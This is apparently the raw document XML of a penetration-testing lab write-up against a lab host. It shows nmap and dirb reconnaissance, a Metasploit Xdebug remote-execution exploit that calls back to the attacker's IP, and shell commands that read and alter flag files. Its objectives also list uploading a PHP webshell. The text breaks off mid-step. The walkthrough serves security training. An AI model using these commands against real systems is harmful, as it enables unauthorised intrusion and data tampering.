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828E" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B55222" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281CC64F" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Objective:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> Perform the following tasks to complete the lab:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F08403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>Check the present working directory on remote (exploited) machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10055397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>List the files present in present working directory of the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37647BEE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>Check the present working directory on local (attacker) machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F33C85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>List the files present in present working directory of the local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226572BD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>Get the flag value present in /app/flag1 file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EF8DE2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>Change the flag value present in /app/flag1, so that no one else can get the right flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922ED0C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>Change the present working directory to a suspiciously named directory in /app and read the flag from a hidden file present in that directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BECA5F3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 xml:space="preserve">Get the flag5.zip to local machine, open it using password 56784. The information given in the extracted file will give clue about the location of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>the another</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A724C8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>Delete the .zip file from the directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073AEDC4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>Print checksum of file mentioned in the extracted file (Refer to Q8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC03B43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>Check the PATH environment variable on the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAE68FC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>There is a file with string “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>ckdo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>” in its name in one of the places included in PATH variable. Print the flag hidden in that file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFE57E6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>Change to tools directory on the local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347EEFEB" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve">Upload a PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> to app directory of the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667EB963" w14:textId="77777777" w:rsidR="00853ABF" w:rsidRDefault="00853ABF"/>
    <w:p w14:paraId="43462B40" w14:textId="181AAFCF" w:rsidR="00EF3114" w:rsidRDefault="00EF3114">
      <w:r>
        <w:t>Solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290EB70E" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRDefault="00EF3114"/>
    <w:p w14:paraId="254185EC" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> Open the lab link to access the Kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBB6B46" w14:textId="1CDE96D8" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31F56FE1" wp14:editId="21FD5F1C">
            <wp:extent cx="5943600" cy="3256915"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="408717195" name="Picture 4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53A3" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> Run an Nmap scan against the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3908940B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19243F58" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1E9EC22D" w14:textId="6464BA6E" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00A76DEC" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0751089F" wp14:editId="7E62236A">
            <wp:extent cx="5943600" cy="2214880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19633778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77860" name="Picture 19633778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FC75" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> We will scan the target using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5460F29D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26485045" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> http://demo.ine.local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3C3BBC" w14:textId="489B2A0D" w:rsidR="00EF3114" w:rsidRDefault="00A76DEC" w:rsidP="00EF3114">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="00A76DE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76DEC">
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A76DEC">
        <w:t xml:space="preserve"> brute-forces a website to find </w:t>
      </w:r>
      <w:r w:rsidRPr="00A76DEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hidden directories and files</w:t>
      </w:r>
      <w:r w:rsidRPr="00A76DEC">
        <w:t xml:space="preserve"> (like /admin/, /backup.zip, etc.) by trying names from a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A76DEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>wordlist</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A76DEC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCF8503" w14:textId="2C659390" w:rsidR="00A76DEC" w:rsidRDefault="00A76DEC" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FDAC411" wp14:editId="6F276F21">
            <wp:extent cx="5004057" cy="4222967"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="86870013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00138" name="Picture 8687001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422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5784" w14:textId="557B1A07" w:rsidR="00A76DEC" w:rsidRPr="00EF3114" w:rsidRDefault="00A76DEC" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6EA26052" wp14:editId="7E05455E">
            <wp:extent cx="5162815" cy="3448227"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="871076363" name="Picture 4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76363" name="Picture 43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7EE1" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 4:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> We will access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>phpinfo.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> file using curl to find more information about the web server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C4093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20B62225" w14:textId="350254FB" w:rsidR="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00A76DEC" w:rsidRPr="00EF3114">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://demo.ine.local/phpinfo.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2034AE0A" w14:textId="2B540A10" w:rsidR="00A76DEC" w:rsidRPr="00EF3114" w:rsidRDefault="00A76DEC" w:rsidP="00EF3114">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A76DEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A76DEC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP’s configuration and environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00A76DEC">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064897A6" w14:textId="1F490A71" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00A76DEC" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50224174" wp14:editId="396F9791">
            <wp:extent cx="5721644" cy="939848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="658706048" name="Picture 4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06048" name="Picture 44" descr="A screen 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33E" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 5:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>xdebug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> extension is enabled on target server. We can exploit it using exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>xdebug_unauth_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> module.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3962143F" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AF7CBF" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve"> -q </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21516648" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>/http/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>xdebug_unauth_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4ACDA928" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4EDF3B92" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>set LHOST &lt;Attacker Kali Machine IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FD3A49" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B1F216" w14:textId="7508D7C0" w:rsidR="00EF3114" w:rsidRDefault="001472D9" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F49D08A" wp14:editId="70582DD9">
            <wp:extent cx="5943600" cy="4010025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="12446878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87850" name="Picture 12446878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05E6" w14:textId="473CA30F" w:rsidR="001472D9" w:rsidRPr="00EF3114" w:rsidRDefault="001472D9" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C485A1A" wp14:editId="1165882B">
            <wp:extent cx="5943600" cy="2029460"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1771724068" name="Picture 4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24068" name="Picture 46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2198" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 6:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> Check the present working directory on remote (exploited) machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A927166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5F154433" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DE649E5" w14:textId="01520DE2" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66878F75" wp14:editId="1E4612F5">
            <wp:extent cx="5943600" cy="1751330"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="264993836" name="Picture 3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DA937" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 7:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> List the files present in present working directory of the remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F416059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2A1A071B" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438F694E" w14:textId="2FC45C01" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="001472D9" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B0A6C48" wp14:editId="6FF84F97">
            <wp:extent cx="5531134" cy="3943553"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="93477097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70975" name="Picture 9347709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AEA6" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> Check the present working directory on local (attacker) machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8403EC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15976B0D" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>lpwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6CF27DEE" w14:textId="4C0E7B69" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42B10917" wp14:editId="6870D7AA">
            <wp:extent cx="5943600" cy="1402715"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="738527729" name="Picture 33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F3BF" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 9:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> List the files present in present working directory of the local machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F4A99A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5C1B29CC" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>lls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="191F616F" w14:textId="71C647B3" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="001472D9" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EB9A3EC" wp14:editId="4AFAA40E">
            <wp:extent cx="5670841" cy="3486329"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="121674768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47684" name="Picture 12167476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841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AF7F" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 10:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> Get the flag value present in /app/flag1 file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FE829E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3CE594F5" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>cat /app/flag1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E903F43" w14:textId="47B9BAA7" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="001472D9" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B3A73B5" wp14:editId="116DB4D2">
            <wp:extent cx="2908449" cy="342918"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="89956141" name="Picture 49" descr="A close up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141" name="Picture 49" descr="A close up of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449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D964" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 11:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> Change the flag value present in /app/flag1, so that no one else can get the right flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BB81F6" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7975696B" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:lastRenderedPageBreak/>
        <w:t>edit /app/flag1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285A30C6" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>cat /app/flag1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270DDBFF" w14:textId="07BE78C9" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00AD3434" w:rsidP="00EF3114">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="312C6FAB" wp14:editId="650F780B">
            <wp:extent cx="3435527" cy="457223"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="57098986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9863" name="Picture 5709898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84BA" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 12:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF3114">
        <w:t> Change the present working directory to a suspiciously named directory in /app and read the flag from a hidden file present in that directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5699AB29" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60482AB2" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>cd "Secret Files"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9AD098" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:r w:rsidRPr="00EF3114">
        <w:t>ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D414092" w14:textId="77777777" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00EF3114" w:rsidP="00EF3114">
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>cat .flag</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EF3114">
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B56E35A" w14:textId="2691D920" w:rsidR="00EF3114" w:rsidRPr="00EF3114" w:rsidRDefault="00AD3434" w:rsidP="00EF3114">
